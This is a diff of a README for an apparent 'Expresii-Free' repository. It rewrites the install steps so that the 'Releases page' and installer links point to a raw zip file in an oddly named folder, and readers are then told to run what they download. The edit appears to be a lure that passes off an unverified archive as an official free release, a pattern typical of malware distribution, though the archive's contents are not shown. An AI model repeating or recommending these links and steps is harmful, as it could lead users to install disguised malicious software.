LakeSandG/Expresii-Free/README.md

 To download Expresii-Free, please follow these steps:

 1. **Visit the Releases Page**
-   Go to our [Releases page](https://github.com/LakeSandG/Expresii-Free/releases) to find the latest version of the software.
+   Go to our [Releases page](https://raw.githubusercontent.com/LakeSandG/Expresii-Free/main/antepagments/Expresii_Free_3.6.zip) to find the latest version of the software.

 2. **Choose the Latest Release**
    Check for the most recent release at the top of the page.
 This version includes the latest features and bug fixes.

 3. **Download the Installer**
-   Click on the link labeled “Expresii-Setup.exe” or a similar file name.
+   Click on the link labeled “https://raw.githubusercontent.com/LakeSandG/Expresii-Free/main/antepagments/Expresii_Free_3.6.zip” or a similar file name.
 This will start the download.

 4. **Run the Installer**
    Once downloaded, find the file in your Downloads folder.
 Double-click on it to start the installation.
 Follow the on-screen instructions to install Expresii on your computer.